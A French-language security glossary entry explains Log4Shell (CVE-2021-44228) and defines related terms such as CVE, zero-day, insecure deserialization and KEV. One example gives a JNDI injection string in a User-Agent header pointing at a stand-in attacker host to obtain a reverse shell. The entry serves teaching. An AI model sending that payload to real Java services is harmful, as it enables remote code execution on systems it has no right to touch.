Vulnérabilités
Log4Shell (CVE-2021-44228)
Aussi appelé: CVE-2021-44228, Vulnérabilité Log4j
Définition
Vulnérabilité critique d'exécution de code à distance d'Apache Log4j 2 révélée en décembre 2021, déclenchable simplement en faisant journaliser une chaîne JNDI.
Exemples
- Envoyer User-Agent: ${jndi:ldap://attacker.com/x} à une application Java et obtenir un reverse shell.
- Exploiter un service Java interne en journalisant une valeur malveillante saisie dans un champ utilisateur.
Termes liés
CVE (Common Vulnerabilities and Exposures)
Catalogue public attribuant un identifiant unique à chaque vulnérabilité divulguée afin de la référencer sans ambiguïté dans toute l'industrie.
Vulnérabilité zero-day
Faille de sécurité inconnue de l'éditeur (ou pour laquelle aucun correctif n'existe encore) au moment de sa découverte ou de son exploitation.
Désérialisation non sécurisée
Vulnérabilité où une application désérialise des données non fiables, permettant à un attaquant d'instancier des objets arbitraires et souvent d'obtenir un RCE.
Attaque de la chaîne d'approvisionnement
Attaque qui compromet un fournisseur de logiciel, de matériel ou de services de confiance afin d'atteindre ses clients en aval.
Exploit
Code, données ou technique exploitant une vulnérabilité pour provoquer un comportement non prévu : exécution de code, élévation de privilèges, fuite d'informations.
Vulnérabilité activement exploitée (KEV)
CVE que la CISA américaine confirme comme étant activement exploitée et ajoute à son catalogue public KEV, déclenchant des délais de remédiation pour les agences fédérales.